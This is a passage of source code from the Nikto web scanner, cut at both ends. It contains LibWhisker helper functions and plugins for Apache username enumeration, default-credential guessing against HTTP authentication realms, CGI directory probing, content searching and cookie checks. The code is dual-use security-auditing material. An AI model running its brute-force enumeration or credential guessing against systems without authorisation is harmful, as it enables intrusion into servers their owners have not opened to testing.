terminated line from the given data.  Use\nthe optional $resetpos to reset the internal position pointer.\nDoes *NOT* return trialing \\n.\n\n=cut\n\n{\n    my $POS = 0;\n\n    sub utils_getline {\n        my ( $dr, $rp ) = @_;\n\n        return undef if ( !( defined $dr && ref($dr) ) );\n        $POS = $rp if ( defined $rp );\n\n        my $where = index( $$dr, \"\\x0a\", $POS );\n        return undef if ( $where == -1 );\n\n        my $str = substr( $$dr, $POS, $where - $POS );\n        $POS = $where + 1;\n\n        return $str;\n    }\n}\n\n#################################################################\n\n=item B<utils_getline_crlf>\n\nParams: \\$data [, $resetpos ]\n\nReturn: $line (undef if no more data)\n\nFetches the next \\r\\n terminated line from the given data.  Use\nthe optional $resetpos to reset the internal position pointer.\nDoes *NOT* return trialing \\r\\n.\n\n=cut\n\n{\n    my $POS = 0;\n\n    sub utils_getline_crlf {\n        my ( $dr, $rp ) = @_;\n\n        return undef if ( !( defined $dr && ref($dr) ) );\n        $POS = $rp if ( defined $rp );\n\n        my $tpos = $POS;\n        while (1) {\n            my $where = index( $$dr, \"\\x0a\", $tpos );\n            return undef if ( $where == -1 );\n\n            if ( substr( $$dr, $where - 1, 1 ) eq \"\\x0d\" ) {\n                my $str = substr( $$dr, $POS, $where - $POS - 1 );\n                $POS = $where + 1;\n                return $str;\n            }\n            else {\n                $tpos = $where + 1;\n            }\n        }\n    }\n}\n\n#################################################################\n\n=item B<utils_save_page>\n\nParams: $file, \\%response\n\nReturn: 0 on success, 1 on error\n\nSaves the data portion of the given whisker %response hash to the\nindicated file.  Can technically save the data portion of a\n%request hash too.  A file is not written if there is no data.\n\nNote: LW does not do any special file checking; files are opened\nin overwrite mode.\n\n=cut\n\n# sub utils_save_page {\n#     my ( $file, $hr ) = @_;\n#     return 1 if ( !ref($hr) || ref($file) );\n#     return 0\n#       if ( !defined $$hr{'whisker'}\n#         || !defined $$hr{'whisker'}->{'data'} );\n#     open( OUT, \">$file\" ) || return 1;\n#     binmode(OUT); # Stupid Windows\n#     print OUT $$hr{'whisker'}->{'data'};\n#     close(OUT);\n#     return 0;\n# }\n\n#################################################################\n\n=item B<utils_getopts>\n\nParams: $opt_str, \\%opt_results\n\nReturn: 0 on success, 1 on error\n\nThis function is a general implementation of GetOpts::Std.  It will\nparse @ARGV, looking for the options specified in $opt_str, and will\nput the results in %opt_results.  Behavior/parameter values are\nsimilar to GetOpts::Std's getopts().\n\nNote: this function does *not* support long options (--option),\noption grouping (-opq), or options with immediate values (-ovalue).\nIf an option is indicated as having a value, it will take the next\nargument regardless.\n\n=cut\n\n# sub utils_getopts {\n#     my ( $str, $ref ) = @_;\n#     my ( %O, $l );\n#     my @left;\n\n#     return 1 if ( $str =~ tr/-:a-zA-Z0-9//c );\n\n#     while ( $str =~ m/([a-z0-9]:{0,1})/ig ) {\n#         $l = $1;\n#         if ( $l =~ tr/://d ) {\n#             $O{$l} = 1;\n#         }\n#         else { $O{$l} = 0; }\n#     }\n\n#     while ( $l = shift(@ARGV) ) {\n#         push( @left, $l ) && next if ( substr( $l, 0, 1 ) ne '-' );\n#         push( @left, $l ) && next if ( $l eq '-' );\n#         substr( $l, 0, 1 ) = '';\n#         if ( length($l) != 1 ) {\n#             %$ref = ();\n#             return 1;\n#         }\n#         if ( $O{$l} == 1 ) {\n#             my $x = shift(@ARGV);\n#             $$ref{$l} = $x;\n#         }\n#         else { $$ref{$l} = 1; }\n#     }\n\n#     @ARGV = @left;\n#     return 0;\n# }\n\n#################################################################\n\n=item B<utils_text_wrapper>\n\nParams: $long_text_string [, $crlf, $width ]\n\nReturn: $formatted_test_string\n\nThis is a simple function used to format a long line of text for\ndisplay on a typical limited-character screen, such as a unix\nshell console.\n\n$crlf defaults to \"\\n\", and $width defaults to 76.\n\n=cut\n\n# sub utils_text_wrapper {\n#     my ( $out, $w, $str, $crlf, $width ) = ( '', 0, @_ );\n#     $crlf  ||= \"\\n\";\n#     $width ||= 76;\n#     $str .= $crlf if ( $str !~ /$crlf$/ );\n#     return $str if ( length($str) <= $width );\n#     while ( length($str) > $width ) {\n#         my $w1 = rindex( $str, ' ',  $width );\n#         my $w2 = rindex( $str, \"\\t\", $width );\n#         if ( $w1 > $w2 ) { $w = $w1; }\n#         else { $w = $w2; }\n#         if ( $w == -1 ) {\n#             $w = $width;\n#         }\n#         else { substr( $str, $w, 1 ) = ''; }\n#         $out .= substr( $str, 0, $w, '' );\n#         $out .= $crlf;\n#     }\n#     return $out . $str;\n# }\n\n#################################################################\n\n=item B<utils_bruteurl>\n\nParams: \\%req, $pre, $post, \\@values_in, \\@values_out\n\nReturn: Nothing (adds to @out)\n        \nBruteurl will perform a brute force against the host/server specified in\n%req.  However, it will make one request per entry in @in, taking the\nvalue and setting $hin{'whisker'}->{'uri'}= $pre.value.$post.  Any URI\nresponding with an HTTP 200 or 403 response is pushed into @out.  An\nexample of this would be to brute force usernames, putting a list of\ncommon usernames in @in, setting $pre='/~' and $post='/'.\n\n=cut\n\n# sub utils_bruteurl {\n#     my ( $hin, $upre, $upost, $arin, $arout ) = @_;\n#     my ( $U, %hout );\n\n#     return if ( !( defined $hin   && ref($hin) ) );\n#     return if ( !( defined $arin  && ref($arin) ) );\n#     return if ( !( defined $arout && ref($arout) ) );\n#     return if ( !defined $upre  || length($upre) == 0 );\n#     return if ( !defined $upost || length($upost) == 0 );\n\n#     http_fixup_request($hin);\n\n#     map {\n#         ( $U = $_ ) =~ tr/\\r\\n//d;\n#         next if ( $U eq '' );\n#         if (\n#             !http_do_request( $hin, \\%hout, { 'uri' => $upre . $U . $upost } ) )\n#         {\n#             if (   $hout{'whisker'}->{'code'} == 200\n#                 || $hout{'whisker'}->{'code'} == 403 )\n#             {\n#                 push( @{$arout}, $U );\n#             }\n#         }\n#     } @$arin;\n# }\n\n#################################################################\n\n=item B<utils_join_tag>\n\nParams: $tag_name, \\%attributes\n\nReturn: $tag_string [undef on error]\n        \nThis function takes the $tag_name (like 'A') and a hash full of\nattributes (like {href=>'http://foo/'}) and returns the \nconstructed HTML tag string (<A href=\"http://foo\">).\n\n=cut\n\n# sub utils_join_tag {\n#     my ( $name, $href ) = @_;\n#     return undef if ( !defined $name || $name eq '' );\n#     return undef if ( !defined $href || !ref($href) );\n#     my ( $out, $k, $v ) = ( \"<$name\", '', '' );\n#     while ( ( $k, $v ) = each %$href ) {\n#         next if ( $k eq '' );\n#         $out .= \" $k\";\n#         $out .= \"=\\\"$v\\\"\" if ( defined $v );\n#     }\n#     $out .= '>';\n#     return $out;\n# }\n\n#################################################################\n\n=item B<utils_request_clone>\n\nParams: \\%from_request, \\%to_request\n\nReturn: 1 on success, 0 on error\n\nThis function takes the connection/request-specific values from the\ngiven from_request hash, and copies them to the to_request hash.\n\n=cut\n\n# sub utils_request_clone {\n#     my ( $from, $to ) = @_;\n#     return 0 if ( !defined $from || !ref($from) );\n#     return 0 if ( !defined $to   || !ref($to) );\n#     return 0 if ( !defined $from->{whisker}->{MAGIC} );\n\n#     %$to = ();\n\n#     # copy headers\n#     my ( $k, $v );\n#     while ( ( $k, $v ) = each(%$from) ) {\n#         next if ( $k eq 'whisker' );\n#         if ( ref($v) ) {\n#             @{ $to->{$k} } = @$v;\n#         }\n#         else {\n#             $to->{$k} = $v;\n#         }\n#     }\n\n#     # copy whisker control values\n#     $to->{whisker} = {};\n#     while ( ( $k, $v ) = each( %{ $from->{whisker} } ) ) {\n#         if ( ref($v) ) {\n#             @{ $to->{whisker}->{$k} } = @$v;\n#         }\n#         else {\n#             $to->{whisker}->{$k} = $v;\n#         }\n#     }\n\n#     return 1;\n# }\n\n#################################################################\n\n=item B<utils_request_fingerprint>\n\nParams: \\%request [, $hash ]\n\nReturn: $fingerprint [undef on error]\n        \nThis function constructs a 'fingerprint' of the given request by\nusing a cryptographic hashing function on the constructed original\nHTTP request.\n\nNote: $hash can be 'md5' (default) or 'md4'.\n\n=cut\n\n# sub utils_request_fingerprint {\n#     my ( $href, $hash ) = @_;\n#     $hash ||= 'md5';\n#     return undef if ( !defined $href || !ref($href) );\n#     return undef if ( !defined $href->{whisker}->{MAGIC} );\n\n#     my $data = '';\n#     if ( $href->{whisker}->{MAGIC} == 31339 ) {    # LW2 request\n#         $data = http_req2line($href);\n#         if ( $href->{whisker}->{version} ne '0.9' ) {\n#             $data .= http_construct_headers($href);\n#             $data .= $href->{whisker}->{raw_header_data}\n#               if ( defined $href->{whisker}->{raw_header_data} );\n#             $data .= $href->{whisker}->{http_eol};\n#             $data .= $href->{whisker}->{data}\n#               if ( defined $href->{whisker}->{data} );\n#         }                                          # http 0.9 support\n\n#         return 'md5:' . md5($data) if ( $hash eq 'md5' );\n#         return 'md4:' . md4($data) if ( $hash eq 'md4' );\n#     }\n\n#     return undef;\n# }\n\n#################################################################\n\n=item B<utils_flatten_lwhash>\n\nParams: \\%lwhash\n\nReturn: $flat_version [undef on error]\n        \nThis function takes a %request or %response libwhisker hash, and\ncreates an approximate flat data string of the original request/\nresponse (i.e. before it was parsed into components and placed\ninto the libwhisker hash).\n\n=cut\n\n# sub utils_flatten_lwhash {\n#     my $hr = shift;\n#     return undef if ( !defined $hr || !ref($hr) );\n#     my $out;\n\n#     if ( $hr->{whisker}->{MAGIC} == 31339 ) {\n#         $out = http_req2line($hr);\n#     }\n#     elsif ( $hr->{whisker}->{MAGIC} == 31340 ) {\n#         $out = http_resp2line($hr);\n#     }\n#     else {\n#         return undef;\n#     }\n\n#     $out .= http_construct_headers($hr);\n#     $out .= $hr->{whisker}->{http_eol} || \"\\x0d\\x0a\";\n#     if ( defined $hr->{whisker}->{data}\n#         && length( $hr->{whisker}->{data} ) > 0 )\n#     {\n#         $out .= $hr->{whisker}->{data};\n#     }\n\n#     return $out;\n# }\n\n#################################################################\n\nsub _utils_carp_common {\n\tmy ($x,$pack,$m) = (0, shift || '',join('',@_) || '(Unknown error)');\n\tmy @s = caller($x++);\n\t@s=caller($x++) while(defined $s[0] && ($s[0] eq 'LW2' || $s[0] eq $pack));\n\treturn $m if !defined $s[0];\n\treturn \"$m at $s[1] line $s[2]\\n\";\n}\n\n=item B<utils_carp>\n\nParams: [ $package_name ]\n\nReturn: nothing\n        \nThis function acts like Carp's carp function.  It warn's with the file and \nline number of user's code which causes a problem.  It traces up the call \nstack and reports the first function that is not in the LW2 or optional \n$package_name package package.\n\n=cut\n\nsub utils_carp {\n\twarn _utils_carp_common(@_);\n}\n\n=item B<utils_croak>\n\nParams: [ $package_name ]\n\nReturn: nothing\n        \nThis function acts like Carp's croak function.  It die's with the file and \nline number of user's code which causes a problem.  It traces up the call \nstack and reports the first function that is not in the LW2 or optional \n$package_name package package.\n\n=cut\n\nsub utils_croak {\n\tdie _utils_carp_common(@_);\n}\n\n\n=back\n\n=head1 SEE ALSO\n\nL<LWP>\n\n=head1 COPYRIGHT\n\nCopyright 2009 Jeff Forristal\n\n=cut\n\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_apacheusers.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Apache user enumeration\n###############################################################################\n\nsub nikto_apacheusers_init {\n    my $id = {\n            name        => \"apacheusers\",\n            full_name   => \"Apache Users\",\n            author      => \"Javier Fernandez-Sanguinoi Pena\",\n            description => \"Checks whether we can enumerate usernames directly from the web server\",\n            hooks       => { scan => { method => \\&nikto_apacheusers, }, },\n            copyright   => \"2008 Chris Sullo\",\n            options     => {\n                         enumerate  => \"Flag to indicate whether to attempt to enumerate users\",\n                         dictionary => \"Filename for a dictionary file of users\",\n                         size       => \"Maximum size of username if bruteforcing\",\n                         home       => \"Look for ~user to enumerate\",\n                         cgiwrap    => \"User cgi-bin/cgiwrap to enumerate\"\n                         }\n              };\n    return $id;\n}\n\nsub nikto_apacheusers {\n    my ($mark, $parameters) = @_;\n    return if $mark->{'terminate'};\n    my $apacheusers = 0;\n\n    # If we haven't been asked to enumerate users then return\n    return unless (defined $parameters->{'enumerate'}\n                   && $parameters->{'enumerate'} == 1);\n\n    # First ensure that the server is vulnerable\n    my ($response, $content) = nfetch($mark, \"/~bin\", \"GET\", \"\", \"\", \"\", \"apacheusers: known user\");\n\n    $content = quotemeta($content);\n    if ($content =~ /forbidden/i)    # good on \"bin\"\n    {\n        my ($response, $content, $errors, $request, $response) =\n          nfetch($mark, \"/~\" . LW2::utils_randstr(8),\n                 \"GET\", \"\", \"\", \"\", \"apacheusers: invalid user\");\n\n        $content = quotemeta($content);\n        if ($content !~ /forbidden/i)    # Good, it gave an error instead of forbidden\n        {\n            add_vulnerability(\n                $mark,\n                \"/~bin: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users and 'not found' for non-existent users).\",\n                999999,\n                \"CVE-2001-1013\",\n                \"GET\",\n                \"/~bin\",\n                $request,\n                $response\n                );\n        }\n        $apacheusers = 1;\n    }\n\n    # If we can't enumerate users then return\n    return unless ($apacheusers == 1);\n\n    # Now we can attempt to enumerate the users\n    my ($url, $dictfile, $size);\n    my @cgiwraps;\n    my @CFGCGI = split(/ /, $VARIABLES{\"\\@CGIDIRS\"});\n\n    if (defined $parameters->{'dictionary'}) {\n        $dictfile = $parameters->{'dictionary'};\n    }\n    if (defined $parameters->{'size'}) {\n        $size = $parameters->{'size'};\n    }\n\n    # Set the URL according to the parameters\n    if (defined $parameters->{'cgiwrap'}) {\n\n        # Check for existence of cgiwrap\n        foreach my $cgidir (@CFGCGI) {\n            my $curl = \"$cgidir\" . \"cgiwrap\";\n            my ($response, $content) =\n              nfetch($mark, $curl, \"GET\", \"\", \"\", \"\", \"user_enum_apache: cgiwrap\");\n            if ($content =~ /check your URL/i) {\n                push(@cgiwraps, \"$curl\");\n            }\n        }\n\n        foreach my $cgiwrap (@cgiwraps) {\n            $url = \"$cgiwrap/~\";\n\n            # First check whether we use a dictionary attack of brute force it\n            if (defined $dictfile) {\n\n                # We have options - assume it is a dictionary attack\n                nikto_user_enum_apache_dictionary($url, $mark, $dictfile);\n            }\n            else {\n                nikto_user_enum_apache_brute($url, $mark, $size);\n            }\n        }\n    }\n    if (defined $parameters->{'home'}) {\n        $url = \"/~\";\n\n        # First check whether we use a dictionary attack of brute force it\n        if (defined $dictfile) {\n\n            # We have options - assume it is a dictionary attack\n            nikto_user_enum_apache_dictionary($url, $mark, $dictfile);\n        }\n        else {\n            nikto_user_enum_apache_brute($url, $mark, $size);\n        }\n    }\n}\n\nsub nikto_user_enum_apache_brute {\n\n    # Note1: This script only generates names with letters A-Z (no numbers)\n    #\n    # Note2: this script will generate SUM(26^n)(n=$min to $max)\n    # it's probably faster to write this to a file than to generate it\n    # on the fly BTW.\n    #\n    # Of course, it could be optimized to skip some \"strange\"\n    # combinations of usernames, but hey, then it wouldn't\n    # be 'brute force' would it? (jfs)\n\n    my ($url, $mark, $size) = @_;\n    $size = 5 if ($size eq \"\");\n    nprint(\"- Enumerating Apache users (1 to $size characters).\", \"v\", \"apacheusers\");\n\n    my $text    = \"a\";\n    my $ctr     = 0;\n    my $message = \"Valid users found via Apache enumeration: \";\n    my ($response, $content);\n    my @foundusers = ();\n    while (length($text) <= $size) {\n        return if $mark->{'terminate'};\n        if (($ctr % 500) eq 0) {\n            nprint(\"- User enumeration guess $ctr ($text)\", \"v\", \"apacheusers\");\n        }\n        ($response, $content, $errors, $request, $response) =\n          nfetch($mark, $url . $text, \"HEAD\", \"\", \"\", \"\", \"user_enum_apache: enumeration\");\n        my $user = nikto_user_enum_apache_check($response, $text);\n        if (defined $user && $user ne \"\") {\n            push(@foundusers, $user);\n        }\n        $text++;\n        $ctr++;\n    }\n    if (scalar(@foundusers)) {\n        my $u = join(', ', @foundusers);\n        add_vulnerability($mark, $message . $u,\n                          \"000479\", \"CVE-2001-1013\", \"HEAD\", \"/\", $request, $response);\n    }\n\n}\n\nsub nikto_user_enum_apache_dictionary {\n    my ($url, $mark, $filename) = @_;\n    my $message    = \"Valid users found via Apache enumeration: \";\n    my @foundusers = ();\n    my ($response, $content);\n    my $ctr = 0;\n\n    nprint(\"- Enumerating Apache users (using dictionary $filename).\", \"v\", \"apacheusers\");\n    unless (open(IN, \"<$filename\")) {\n        nprint(\"+ ERROR: Unable to open dictionary file $filename: $!.\");\n    }\n\n    # Now attempt on each entry\n    while (<IN>) {\n        return if $mark->{'terminate'};\n        chomp;\n        s/\\#.*$//;\n\n        # remove preceding ~ just in case\n        s/^~//;\n        if ($_ eq \"\")          { next }\n        if (($ctr % 500) == 0) { nprint(\"- User enumeration guess $ctr ($_)\", \"v\", \"apacheusers\"); }\n        ($response, $content, $errors, $request, $response) =\n          nfetch($mark, $url . $_, \"HEAD\", \"\", \"\", \"\", \"user_enum_apache: dictionary\");\n        my $user = nikto_user_enum_apache_check($response, $_);\n        if ($user) {\n            push(@foundusers, $user);\n        }\n        $ctr++;\n    }\n    close(IN);\n    if (scalar(@foundusers)) {\n        my $u = join(', ', @foundusers);\n        add_vulnerability($mark, $message . $u,\n                          \"000478\", \"CVE-2001-1013\", \"HEAD\", \"/\", $request, $response);\n    }\n}\n\nsub nikto_user_enum_apache_check {\n    (my $code, $user) = @_;\n    my $response = \"\";\n\n    foreach my $found (split(/ /, $VARIABLES{\"\\@HTTPFOUND\"})) {\n        if ($code eq $found) {\n            $response = $user;\n            last;\n        }\n    }\n\n    return $response;\n}\n\n1;\n\n"
  },
  {
    "path": "program/plugins/nikto_auth.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Attempt to guess authentication realms\n###############################################################################\n\nsub nikto_auth_init {\n    my $id = { name        => 'auth',\n               full_name   => 'Test Authentication',\n               author      => 'Sullo/Tautology',\n               description => 'Attempt to guess authentication realms',\n               hooks       => {\n                          start => { method => \\&nikto_auth_load,\n                                     weight => 1,\n                                     },\n                          postfetch => { method => \\&nikto_auth,\n                                         weight => 19,\n                                         cond   => '$response->{whisker}->{code} eq 401',\n                                         },\n                          prefetch => { method => \\&nikto_auth_pre,\n                                        weight => 1,\n                                        },\n                            },\n               copyright => \"2010 Chris Sullo\"\n               };\n\n    use vars qw/$REALMS/;\n\n    return $id;\n}\n\n# Load up the database as soon as we can\nsub nikto_auth_load {\n\n    if (defined $CLI{'hostauth'}) {\n        use Text::ParseWords;\n        my @array = nested_quotewords(':', 0, $CLI{'hostauth'});\n\n        if (($array[0][0] ne \"\") || ($array[0][1] ne \"\")) {\n\n            my $HOSTAUTH = { nikto_id => \"700500\",\n                             realm    => (defined $array[0][2]) ? $array[0][2] : '@ANY',\n                             password => $array[0][1] || \"\",\n                             id       => $array[0][0] || \"\",\n                             message  => \"Credentials provided via CLI.\",\n                             };\n            unshift(@{$REALMS}, $HOSTAUTH);\n        }\n    }\n    else {\n        $REALMS = init_db(\"db_realms\");\n    }\n}\n\n# Prefetch method can only set a default if it exists, since we don't have\n# any returned 401 header. This may mean we send auth headers when they are not\n# required, but it shouldn't matter. It also means if there are multiple realms\n# the postfetch method will keep changing default...\nsub nikto_auth_pre {\n    my ($mark, $parameters, $request, $response) = @_;\n    if ($mark->{'realms'}{'default'}{'status'}) {\n        LW2::auth_set($mark->{'realms'}{'default'}{'authtype'},\n                      $request,\n                      $mark->{'realms'}{'default'}{'id'},\n                      $mark->{'realms'}{'default'}{'password'});\n        $request->{'whisker'}->{'allow_short_reads'} = 1;\n        LW2::http_fixup_request($request);\n    }\n    return $request, $response;\n}\n\n# Split up www-authenticate to realm and method\nsub split_auth_header {\n    my $header = $_[0] || return;\n    my ($realm, $authtype);\n    my @authenticate = split(/=/, $header);\n    if ($authenticate[0] =~ /^ntlm/i) {\n        $realm = $authtype = 'ntlm';\n    }\n    else {\n        $realm = $authenticate[1];\n        $realm =~ s/^\\\"//;\n        $realm =~ s/\\\".*$//;\n        if ($authenticate[0] =~ /^basic/i) {\n            $authtype = 'basic';\n        }\n        elsif ($authenticate[0] =~ /^digest/i) {\n            $authtype = 'digest';\n        }\n    }\n    return $realm, $authtype;\n}\n\n# Actual authentication and retry takes place here.\n# If present, user-supplied credentials will be tried first\nsub nikto_auth {\n    my ($mark, $parameters, $request, $response) = @_;\n\n    unless (defined $response->{'www-authenticate'}) {\n        nprint(\"+ ERROR: No authentication header defined: $response->{'whisker'}->{'uri'}\",\n               \"v\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        return $request, $response;\n    }\n\n    my ($realm, $authtype) = split_auth_header($response->{'www-authenticate'});\n    $authtype = 'basic' if $authtype eq '';\n\n    # did we already test this realm?\n    if (exists $mark->{'realms'}{$realm}{'status'}) {\n        return $request, $response;\n    }\n\n    nprint(\"+ $response->{'whisker'}->{'uri'} - Requires Authentication for realm '$realm'\",\n           \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}))\n      if ($OUTPUT{'show_auth'} || $response->{'whisker'}->{'uri'} =~ /^$CLI{'root'}\\/?$/);\n\n    # Save to revert\n    $save_auth = $response->{'www-authenticate'};\n\n    # Now we can try the passwords\n    nprint(\"Testing creds for '$realm'\",\n           \"v\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n    my $success = 0;\n    foreach my $entry (@{$REALMS}) {\n        return if $mark->{'terminate'};\n        unless ($realm =~ /$entry->{'realm'}/i || $entry->{'realm'} eq '@ANY') { next; }\n\n        # Set up LW hash\n        LW2::auth_set($authtype, $request, $entry->{'id'}, $entry->{'password'});\n\n        # Patch to fix short reads\n        $request->{'whisker'}->{'allow_short_reads'} = 1;\n        LW2::http_fixup_request($request);\n\n        sleeper();\n        LW2::http_do_request_timeout($request, $response);    # test auth\n        $COUNTERS{'totalrequests'}++;\n        dump_var(\"Auth Request\",  $request);\n        dump_var(\"Auth Response\", $response);\n        nprint(\"- Tested credentials: \"\n                 . $entry->{'id'} . \"/\"\n                 . $entry->{'password'}\n                 . \"- response: \"\n                 . $response->{'whisker'}->{'code'},\n               \"v\",\n               ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'})\n               );\n\n        $mark->{'realms'}{$realm}{'status'}   = 0;\n        $mark->{'realms'}{$realm}{'id'}       = $entry->{'id'};\n        $mark->{'realms'}{$realm}{'password'} = $entry->{'password'};\n        $mark->{'realms'}{$realm}{'authtype'} = $authtype;\n\n        if (   $response->{'whisker'}->{'code'} !~ /40[13]/\n            && $response->{'whisker'}->{'code'} ne \"500\"\n            && !defined $response->{'whisker'}->{'error'}) {\n            unless ($entry->{'checked'} == 1) {\n                my $message;\n                my $ref;\n                if ($entry->{'message'} eq \"Credentials provided via CLI.\") {\n                    $message =\n                      \"Successfully authenticated to realm '$realm' with user-supplied credentials.\";\n                }\n                elsif ($entry->{'id'} eq '' && $entry->{'password'} eq '') {\n                    $message =\n                      \"Blank credentials found at $request->{'whisker'}->{uri}, $entry->{'realm'}: $entry->{'msg'}.\";\n                    $ref = \"CWE-16\";\n                }\n                else {\n                    $message = $request->{'whisker'}->{'uri'}\n                      . \": Default account found for '$realm' at (ID '$entry->{'id'}', PW '$entry->{'password'}'). $entry->{message}.\";\n                    $ref = \"CWE-16\";\n                }\n\n                add_vulnerability($mark, $message, $entry->{'nikto_id'}, $ref, \"GET\",\n                                  $request->{'whisker'}->{'uri'},\n                                  $request, $response);\n\n                # Mark it successful\n                $success                            = 1;\n                $entry->{'checked'}                 = 1;\n                $mark->{'realms'}{$realm}{'status'} = 1;\n                $mark->{'realms'}{'default'}        = $mark->{'realms'}{$realm};\n                last;\n            }\n        }\n        else {\n            # set this back\n            $response->{'www-authenticate'} = $save_auth;\n        }\n    }\n    LW2::auth_unset($request);\n    if (!$success) {\n        nprint(\"+ \" . $request->{'whisker'}->{'uri'} . \": No creds found for realm '$realm'\",\n               \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n    }\n\n    return $request, $response;\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_cgi.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Perform CGI tests\n###############################################################################\nsub nikto_cgi_init {\n    my $id = { name        => \"cgi\",\n               full_name   => \"CGI\",\n               author      => \"Sullo\",\n               description => \"Enumerates possible CGI directories.\",\n               hooks       => { recon => { method => \\&nikto_cgi, }, },\n               copyright   => \"2008 Chris Sullo\",\n               };\n    return $id;\n}\n\nsub nikto_cgi {\n    my ($mark) = @_;\n    my ($gotvalid, $gotinvalid) = (0, 0);\n    my @POSSIBLECGI;\n    my @CFGCGI = split(' ', $VARIABLES{'@CGIDIRS'});\n    my ($res, $content, $possiblecgidir, $found) = ('', '', '', '');\n\n    if (defined $CLI{'forcecgi'}) {\n        if ($CLI{'forcecgi'} eq \"all\") {\n            nprint(\"Using all known CGI directories\\n\", \"d\");\n            $VARIABLES{'@CGIDIRS'} = @CFGCGI ? join(\" \", @CFGCGI) : \"\";\n        }\n        elsif ($CLI{'forcecgi'} eq \"none\") {\n            nprint(\"- No CGI directories are set\\n\", \"v\", \"cgi\");\n            $VARIABLES{'@CGIDIRS'} = \"\";\n        }\n        else {\n            nprint(\"Using CGI dir '$CLI{'forcecgi'}'\\n\", \"d\");\n            $VARIABLES{'@CGIDIRS'} = $CLI{'forcecgi'};\n        }\n    }\n    else    # or normal testing of each dir\n    {\n        foreach my $possiblecgidir (@CFGCGI) {\n            return if $mark->{'terminate'};\n            my ($res, $content, $error, $request, $response) =\n              nfetch($mark, $possiblecgidir, \"GET\", \"\", \"\", \"\", \"CGI\");\n            nprint(\"Checked for CGI dir\\t$possiblecgidir\\tgot:$res\",\n                   \"d\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n            if ($res =~ /^40[135]$/ && !is_404($mark, $possiblecgidir, $response)) {\n                $gotvalid++;\n                push @POSSIBLECGI, $possiblecgidir;\n            }\n        }\n\n        if ($gotvalid == 0) {\n            nprint(\n                \"+ No CGI Directories found (use '-C all' to force check all possible dirs). CGI tests skipped.\"\n                );\n            $VARIABLES{'@CGIDIRS'} = \"\";\n        }\n        elsif (scalar(@CFGCGI) == scalar(@POSSIBLECGI)) {\n            nprint(\"+ All CGI directories 'found', use '-C none' to test none\");\n            $VARIABLES{'@CGIDIRS'} = join(\" \", @CFGCGI);\n        }\n        else {\n            $VARIABLES{'@CGIDIRS'} = join(\" \", @POSSIBLECGI);\n        }\n    }\n\n    nprint(\"- Checking for CGI in: $VARIABLES{'@CGIDIRS'}\", \"v\", \"cgi\");\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_content_search.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Search content for known bad strings\n###############################################################################\n\nsub nikto_content_search_init {\n    use vars qw/$CONTENTSEARCH %CSMATCHED/;\n    my $id = { name        => \"content_search\",\n               full_name   => \"Content Search\",\n               author      => \"Sullo\",\n               description => \"Search response content for interesting strings\",\n               hooks       => {\n                          start => { method => \\&nikto_content_search_load,\n                                     weight => 1,\n                                     },\n                          postfetch => { method => \\&nikto_content_search,\n                                         weight => 20,\n                                         },\n                            },\n               copyright => \"2010 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_content_search_load {\n\n    # Load up the database as soon as we can\n\n    $CONTENTSEARCH = init_db(\"db_content_search\");\n    %CSMATCHED     = ();\n\n    # to try and speed it up - precompile the regular expressions\n    foreach my $testid (@$CONTENTSEARCH) {\n        $testid->{'compiled'} = qr/$testid->{'matchstring'}/;\n    }\n}\n\nsub nikto_content_search {\n    my ($mark, $parameters, $request, $response) = @_;\n\n    my $whisker = $response->{'whisker'};\n    my $body    = $whisker->{'data'};\n    my ($file)  = LW2::uri_split($whisker->{'uri'});\n    my $method  = $whisker->{'method'} || \"GET\";\n    my $host    = $mark->{'hostname'};\n    my $matched = ($CSMATCHED{$host} ||= {});\n\n    foreach my $testid (@$CONTENTSEARCH) {\n        next if $matched->{$file};\n\n        # Check whether we've already matched it\n        if ($body =~ $testid->{'compiled'}) {\n            my @caps = grep { defined $_ } ($1, $2, $3, $4, $5, $6, $7, $8, $9);\n            my $msg = process_captured_groups($testid->{'message'}, \\@caps);\n            my $outmessage = \"$file: $msg\";\n            add_vulnerability($mark, $outmessage, $testid->{'nikto_id'}, $testid->{'refs'},\n                              $method, $file, $request, $response);\n            $matched->{$file} = 1;\n        }\n    }\n    return $request, $response;\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_cookies.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: General HTTP cookie checks\n###############################################################################\nsub nikto_cookies_init {\n    my $id = {\n         name        => \"cookies\",\n         full_name   => \"HTTP Cookie Internal IP\",\n         author      => \"Sullo\",\n         description => \"Looks for internal IP addresses in cookies returned from an HTTP request.\",\n         hooks       => { postfetch => { method => \\&nikto_cookies_postfetch, }, },\n         copyright   => \"2010 Chris Sullo\"\n         };\n\n    # Store cookies to ensure we don't report multiple times.\n    my %CFOUND;\n    return $id;\n}\n\nsub nikto_cookies_postfetch {\n    my ($mark, $parameters, $request, $response) = @_;\n\n    if (!exists $response->{'set-cookie'}) {\n        return $request, $response;\n    }\n\n    foreach my $c (@{ $response->{'whisker'}->{'cookies'} }) {\n        my $c2 = $c;\n        $c =~ /([^=]+)+=([^;]+)/;\n        my $cname  = $1;\n        my $cvalue = $2;\n        next if (defined $CFOUND{$cname}{ $mark->{hostname} });\n\n        # secure flag\n        if ($c !~ /secure/i && $mark->{ssl}) {\n            add_vulnerability($mark,\n                              $request->{'whisker'}->{'uri'}\n                                . \": Cookie $cname created without the secure flag\",\n                              999961,\n                              \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies\",\n                              $request->{'whisker'}->{'method'},\n                              $request->{'whisker'}->{'uri'},\n                              